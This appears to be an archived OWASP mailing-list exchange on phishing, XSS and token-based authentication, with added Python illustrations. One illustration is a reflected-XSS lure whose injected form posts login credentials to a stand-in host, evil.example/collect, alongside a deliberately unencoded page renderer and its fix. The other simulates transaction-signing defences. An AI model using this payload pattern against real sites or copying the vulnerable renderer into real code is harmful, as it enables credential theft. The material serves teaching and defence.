[OWASP-GUIDE] Phishing section in the guide: no XSS or secure auth?
Andrew van der Stock
vanderaj at greebo.net
Mon Sep 12 09:28:04 EDT 2005
Comment inserted into the latest chapter - I will deal with it shortly.
On 03/08/2005, at 8:45 PM, Javier Fernandez-Sanguino wrote:
> Just a question that popped into my mind when skimming through the
> phishing section in the Guide:
> - There is no mention of the issues related to phishing scams and
> XSS attacks. While a phishing web server can be taken off by the
> authorities, it is much harder to do so if a phisher uses flaws in
> _your_site_ (through XSS) to organise a phishing scam. Not
> only is the fix more complex ("have to fix the application! now!")
> but it also makes other recommendations about phishing worthless
> ("make sure you are on a secure site? Check. Web site belongs to
> the bank? Check. SSL in use? Check....")
> - (This might be controversial) There is no mention of replacing
> the aged user/password login process with secure authentication (be
> it tokens or smart cards). Granted, secure authentication does not
> drive phishing attacks away, but it does shift them from "steal
> password" to "steal session" (or MITM attacks), and if you are using
> secure authentication for the "operation" key (not the "access"
> key), i.e. the one that is not associated with the session, you
> force phishers to shift tactics. (They will probably shift tactics
> to trojaning remote users' systems, however.)
> Just a few cents to spark some discussion. Andrew, if you want to,
> I can write some paragraphs about this for that section.
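As an added illustration of the first point above (example code written for this archive page, not taken from the Guide or from either author), the snippet below shows a reflected XSS flaw on a bank's own login page being used to serve the phisher's credential form from the bank's real, TLS-protected address, next to the same page with output encoding applied. The hosts bank.example and evil.example, the msg query parameter and the page markup are assumptions made for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode, urlparse, parse_qs

# Assumed names, for illustration only.
BANK_ORIGIN = "https://bank.example"
BANK_LOGIN = BANK_ORIGIN + "/login"
ATTACKER_COLLECTOR = "https://evil.example/collect"


def _login_page(notice_html: str) -> str:
    """Shared page skeleton; notice_html is placed as-is above the real login form."""
    return (
        "<html><body>"
        f"<p class='notice'>{notice_html}</p>"
        f"<form method='post' action='{BANK_LOGIN}'>"
        "<input name='user'><input name='pass' type='password'>"
        "<button>Log in</button></form>"
        "</body></html>"
    )


def render_login_vulnerable(msg: str) -> str:
    """Reflects the 'msg' query parameter into the page without encoding (XSS)."""
    return _login_page(msg)


def render_login_fixed(msg: str) -> str:
    """Same page, but the untrusted value is HTML-encoded before it is reflected."""
    return _login_page(html.escape(msg, quote=True))


def serve(renderer, url: str) -> str:
    """Simulates the bank's /login handler reading ?msg= from the requested URL."""
    params = parse_qs(urlparse(url).query)
    return renderer(params.get("msg", [""])[0])


def build_lure_url() -> str:
    """The phisher's link: a genuine bank URL whose msg parameter injects a fake form."""
    payload = (
        "Session expired, please sign in again.</p>"
        f"<form method='post' action='{ATTACKER_COLLECTOR}'>"
        "<input name='user'><input name='pass' type='password'>"
        "<button>Log in</button></form><p>"
    )
    return BANK_LOGIN + "?" + urlencode({"msg": payload})


def lure_origin() -> tuple:
    """(scheme, host) of the lure, i.e. what the victim's address bar and padlock show."""
    u = urlparse(build_lure_url())
    return (u.scheme, u.hostname)


class _FormActions(HTMLParser):
    """Collects the action attribute of every <form> a browser would render."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action"))


def form_actions(page: str) -> list:
    """Where the credentials typed into the page would be posted, in page order."""
    p = _FormActions()
    p.feed(page)
    return p.actions


if __name__ == "__main__":
    url = build_lure_url()
    print("lure origin:", lure_origin())
    print("vulnerable page posts to:", form_actions(serve(render_login_vulnerable, url)))
    print("fixed page posts to:     ", form_actions(serve(render_login_fixed, url)))
```

The lure's scheme is https and its host is bank.example, so every "check the address, check the padlock, check the certificate" recommendation passes; the first form the victim sees on the vulnerable page posts to evil.example. Only the application-side fix (encoding the reflected value for the HTML context) removes the injected form, which is the "have to fix the application! now!" situation the mail describes.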
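As an added illustration of the second point (example code written for this archive page, not the Guide's and not either author's design), the sketch below separates the "access" credential, a login session, from an "operation" credential: an HMAC-based code computed with a per-user secret held on a token over the details of one specific transfer. The Bank class, the counter-based replay check, the 8-digit truncation and the constructed secrets are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Constructed demo secrets so the run is deterministic. In practice the operation
# secret is provisioned onto the user's token or smart card and is never typed
# into, or readable from, the browser session.
K_ALICE = b"constructed-demo-secret-on-alice-token"
K_ATTACKER_GUESS = b"constructed-secret-the-phisher-does-not-have"


def operation_code(op_secret: bytes, beneficiary: str, amount: int, counter: int) -> str:
    """The code the token displays for exactly this transfer (beneficiary, amount, counter)."""
    msg = f"{beneficiary}|{amount}|{counter}".encode()
    mac = hmac.new(op_secret, msg, hashlib.sha256).digest()
    # HOTP-style truncation to 8 decimal digits so a user can type it from a token display.
    n = int.from_bytes(mac[:4], "big") & 0x7FFFFFFF
    return f"{n % 10**8:08d}"


class Bank:
    """Toy server side: an access credential (session) plus per-operation codes."""

    def __init__(self):
        self.op_secrets = {}   # user -> token secret shared at enrolment
        self.sessions = {}     # session id -> user; this is all a phished login yields
        self.used = set()      # (user, counter) already spent: replay protection
        self.ledger = []

    def enrol(self, user: str, op_secret: bytes) -> None:
        self.op_secrets[user] = op_secret

    def login(self, user: str) -> str:
        """Called once the 'access' authentication has succeeded; returns the session id."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = user
        return sid

    def transfer_session_only(self, sid: str, beneficiary: str, amount: int) -> str:
        """Weak scheme: whoever holds the session can move money."""
        user = self.sessions.get(sid)
        if user is None:
            return "rejected: no session"
        self.ledger.append((user, beneficiary, amount))
        return "ok"

    def transfer_signed(self, sid: str, beneficiary: str, amount: int,
                        counter: int, op_code: str) -> str:
        """Operation-bound scheme: the code must match this exact transfer."""
        user = self.sessions.get(sid)
        if user is None:
            return "rejected: no session"
        if (user, counter) in self.used:
            return "rejected: replay"
        expected = operation_code(self.op_secrets[user], beneficiary, amount, counter)
        if not hmac.compare_digest(expected, op_code):
            return "rejected: bad operation code"
        self.used.add((user, counter))
        self.ledger.append((user, beneficiary, amount))
        return "ok"


def scenarios() -> dict:
    """Runs the attacks discussed in the mail against both schemes; returns the outcomes."""
    bank = Bank()
    bank.enrol("alice", K_ALICE)
    sid = bank.login("alice")
    out = {}
    # 1. Alice reads the code for (bob, 100, counter 1) off her token and submits it.
    out["legit"] = bank.transfer_signed(sid, "bob", 100, 1, operation_code(K_ALICE, "bob", 100, 1))
    # 2. The session was stolen (phished page, XSS). Against the session-only scheme that is enough.
    out["stolen_session_unsigned"] = bank.transfer_session_only(sid, "mallory", 5000)
    # 3. Same stolen session, signed scheme: the thief has no token secret to compute a code.
    guess = operation_code(K_ATTACKER_GUESS, "mallory", 5000, 2)
    out["stolen_session_signed"] = bank.transfer_signed(sid, "mallory", 5000, 2, guess)
    # 4. MITM relays Alice's genuine code for (bob, 250, 3) but rewrites the beneficiary.
    relayed = operation_code(K_ALICE, "bob", 250, 3)
    out["mitm_altered"] = bank.transfer_signed(sid, "mallory", 250, 3, relayed)
    # 5. Replay of transfer 1, which Alice already executed.
    out["replay"] = bank.transfer_signed(sid, "bob", 100, 1, operation_code(K_ALICE, "bob", 100, 1))
    return out


if __name__ == "__main__":
    for name, result in scenarios().items():
        print(f"{name:26s} {result}")
```

The stolen session succeeds against the session-only transfer, which is the shift from "steal password" to "steal session" the mail describes. Against the operation-bound transfer the thief has no token secret, and a relay that alters the beneficiary fails because the code covers the transaction details, not just the session. What remains is the move the mail predicts: malware on the user's own machine that presents the attacker's transaction for the user to sign.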